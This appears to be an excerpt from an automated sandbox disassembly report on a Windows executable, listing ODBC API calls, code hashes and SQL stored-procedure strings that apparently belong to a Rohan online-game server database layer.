                                                                                      • Instruction ID: b469214eccf6d2753a0652ebf366c86541dfcbed847d55abee172120915fcca6
                                                                                      • Opcode Fuzzy Hash: 1ea704fe1dea27c90056f9c87c2ac954dd751cb994a7194c4c9c64639a5b0988
                                                                                      • Instruction Fuzzy Hash: 11515AB4A00108EFCB18CF54C885EEAB7B5BB4C704F1481D9E90997392D670AE85CF99
                                                                                      APIs
                                                                                      • #4.ODBC32(?,00000000,000000F0,?,00000000,00000000), ref: 00443BF7
                                                                                      • #4.ODBC32(?,00000000,000000F0,?,00000000,00000000,?,00000000,000000F0,?,00000000,00000000), ref: 00443C1B
                                                                                      • #4.ODBC32(?,00000000,000000F0,?,00000000,00000000,?,00000000,000000F0,?,00000000,00000000,?,00000000,000000F0,?), ref: 00443C3F
                                                                                      • #4.ODBC32(?,00000000,00000001,?,00000015,00000000,?,00000000,000000F0,?,00000000,00000000,?,00000000,000000F0,?), ref: 00443C63
                                                                                      • #4.ODBC32(?,00000000,000000FA,?,00000000,00000000,?,00000000,00000001,?,00000015,00000000,?,00000000,000000F0,?), ref: 00443C87
                                                                                      • #4.ODBC32(?,00000000,000000FA,?,00000000,00000000,?,00000000,000000FA,?,00000000,00000000,?,00000000,00000001,?), ref: 00443CAB
                                                                                      • #4.ODBC32(?,00000000,000000FA,?,00000000,00000000,?,00000000,000000FA,?,00000000,00000000,?,00000000,000000FA,?), ref: 00443CCF
                                                                                      • #4.ODBC32(?,00000000,000000E7,?,00000000,00000000,?,00000000,000000FA,?,00000000,00000000,?,00000000,000000FA,?), ref: 00443CF3
                                                                                      • #4.ODBC32(?,00000000,000000FA,?,00000000,00000000,?,00000000,000000E7,?,00000000,00000000,?,00000000,000000FA,?), ref: 00443D17
                                                                                      • #4.ODBC32(?,00000000,000000F1,?,00000000,00000000,?,00000000,000000FA,?,00000000,00000000,?,00000000,000000E7,?), ref: 00443D3B
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 989bc33b62a8b6a9bc196136f977584ea2205344349f311faf3f31ba0da4645a
                                                                                      • Instruction ID: 869de7ff078e687d3b062c94cfe1e2efde708deb3b4d567e88330bc1da5e1539
                                                                                      • Opcode Fuzzy Hash: 989bc33b62a8b6a9bc196136f977584ea2205344349f311faf3f31ba0da4645a
                                                                                      • Instruction Fuzzy Hash: 5151DCB5A00508ABDB14DF99CE51FEE73B9EF88714F208249F6117B3C1E676AD108768
                                                                                      APIs
                                                                                      • #19.ODBC32(?,{? = CALL [ROHAN_UpdateMapMemo] (?, ?, ? ,?, ?)},000000FD), ref: 004319D4
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000), ref: 00431A13
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000004,000000F0,00000004,00000000), ref: 00431A48
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F1,00000005,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 00431A80
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F1,00000005,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F1,00000005,00000000), ref: 00431AB8
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F1,00000005,00000000), ref: 00431AF0
                                                                                      • #72.ODBC32(?,00000000,00000001,000000FE,000000FD,0000001E,00000000,?,00000000,?,?,00000000,00000001,000000F0,00000004,00000000), ref: 00431B3A
                                                                                      Strings
                                                                                      • {? = CALL [ROHAN_UpdateMapMemo] (?, ?, ? ,?, ?)}, xrefs: 004319CB
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: {? = CALL [ROHAN_UpdateMapMemo] (?, ?, ? ,?, ?)}
                                                                                      • API String ID: 0-963639086
                                                                                      • Opcode ID: 431a11d03efd4cb7e53566664f4e92dc7837d290e4e9bbb22a94039f384b9c29
                                                                                      • Instruction ID: d70507fdbef98a4b9eb81598e6b7c54e7e0b9c422c9e1c8151d813e79e361366
                                                                                      • Opcode Fuzzy Hash: 431a11d03efd4cb7e53566664f4e92dc7837d290e4e9bbb22a94039f384b9c29
                                                                                      • Instruction Fuzzy Hash: C0415670A406187BEB249F44CC52FAA73B4FB84719F14C28CF6547E2C5DAB56D808F98
                                                                                      APIs
                                                                                      • #19.ODBC32(?,{? = CALL [ROHAN_InsertMapMemo] (?, ?, ? ,? ,?)},000000FD), ref: 004316FF
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000), ref: 0043173E
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000004,000000F0,00000004,00000000), ref: 00431773
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F1,00000005,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 004317AB
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F1,00000005,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F1,00000005,00000000), ref: 004317E3
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F1,00000005,00000000), ref: 0043181B
                                                                                      • #72.ODBC32(?,00000000,00000001,000000FE,000000FD,0000001E,00000000,?,00000000,?,?,00000000,00000001,000000F0,00000004,00000000), ref: 0043185B
                                                                                      Strings
                                                                                      • {? = CALL [ROHAN_InsertMapMemo] (?, ?, ? ,? ,?)}, xrefs: 004316F6
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: {? = CALL [ROHAN_InsertMapMemo] (?, ?, ? ,? ,?)}
                                                                                      • API String ID: 0-1444967836
                                                                                      • Opcode ID: 6101895e9b4713de0a4a568e9e4bee4b4f2de7c4b605b6a38487b85ad0353d39
                                                                                      • Instruction ID: a8dd0ea4eb6a3700a08e41645213e6cb3600340bca2bfbc8e3a56616f3b69ed7
                                                                                      • Opcode Fuzzy Hash: 6101895e9b4713de0a4a568e9e4bee4b4f2de7c4b605b6a38487b85ad0353d39
                                                                                      • Instruction Fuzzy Hash: 1C41C271640314ABEB649B54CC52F9973B5FBC4F18F20C289F6586A2C9DDB16A80CB98
                                                                                      APIs
                                                                                      • #19.ODBC32(?,{? = CALL [ROHAN_InitSkillEx] (?,?,?,?,?)},000000FD), ref: 00432114
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000), ref: 00432153
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000004,000000F0,00000004,00000000), ref: 00432188
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F1,00000005,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 004321C0
                                                                                      • #72.ODBC32(?,00000000,00000001,000000FA,000000FA,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F1,00000005,00000000), ref: 004321F8
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F1,00000005,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000FA,000000FA,00000000), ref: 00432230
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F1,00000005,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F1,00000005,00000000), ref: 00432268
                                                                                      Strings
                                                                                      • {? = CALL [ROHAN_InitSkillEx] (?,?,?,?,?)}, xrefs: 0043210B
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: {? = CALL [ROHAN_InitSkillEx] (?,?,?,?,?)}
                                                                                      • API String ID: 0-2685933068
                                                                                      • Opcode ID: 8f9092834e70e56e4cc412fc4cedc177ad2269e0767285a24a9af19ca8d0659f
                                                                                      • Instruction ID: bbedabbe50930767c36a09a2fd0d4c2e7050d78e22c4077049a21a9f1bf36ca4
                                                                                      • Opcode Fuzzy Hash: 8f9092834e70e56e4cc412fc4cedc177ad2269e0767285a24a9af19ca8d0659f
                                                                                      • Instruction Fuzzy Hash: D841F470A45214BBFB249B54CC52FA973B4FB44B14F14C2C8F6956E2C5D9B16D808FA8
                                                                                      APIs
                                                                                      • #19.ODBC32(?,{ ? = CALL [ROHAN_InsNGuildPostBox] (?,?,?,?,?) } ,000000FD), ref: 004251DF
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000), ref: 0042521E
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000004,000000F0,00000004,00000000), ref: 00425253
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 0042528B
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 004252C3
                                                                                      • #72.ODBC32(?,00000000,00000001,000000FA,000000FA,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 004252FB
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000FA,000000FA,00000000), ref: 00425333
                                                                                      Strings
                                                                                      • { ? = CALL [ROHAN_InsNGuildPostBox] (?,?,?,?,?) } , xrefs: 004251D6
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: { ? = CALL [ROHAN_InsNGuildPostBox] (?,?,?,?,?) }
                                                                                      • API String ID: 0-1871579317
                                                                                      • Opcode ID: ccf2a846a8ab2a7f77b0d34c3eb5986345c602ac7aacf92c158e20e3bf71881e
                                                                                      • Instruction ID: 6d8c9b4bbc335de754213000ee3570b67c18a48b20b050c6548d87a37e0746fa
                                                                                      • Opcode Fuzzy Hash: ccf2a846a8ab2a7f77b0d34c3eb5986345c602ac7aacf92c158e20e3bf71881e
                                                                                      • Instruction Fuzzy Hash: BC41E1B0A443147BEB64DB54CC92FE97374EB84B28F208289F7187E2C5D5B16E80CB58
                                                                                      APIs
                                                                                      • #19.ODBC32(?,{? = CALL [ROHAN_GetTCharacterUI] (?,?,?,?,?)},000000FD), ref: 00431386
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000), ref: 004313C5
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000004,000000F0,00000004,00000000), ref: 004313FA
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 00431432
                                                                                      • #72.ODBC32(?,00000000,00000001,000000E7,000000FB,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 0043146A
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000E7,000000FB,00000000), ref: 004314A2
                                                                                      • #72.ODBC32(?,00000000,00000004,000000FE,000000FD,000009C4,00000000,?,000009C4,00000000,?,00000000,00000004,000000F0,00000004,00000000), ref: 004314E0
                                                                                      Strings
                                                                                      • {? = CALL [ROHAN_GetTCharacterUI] (?,?,?,?,?)}, xrefs: 0043137D
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
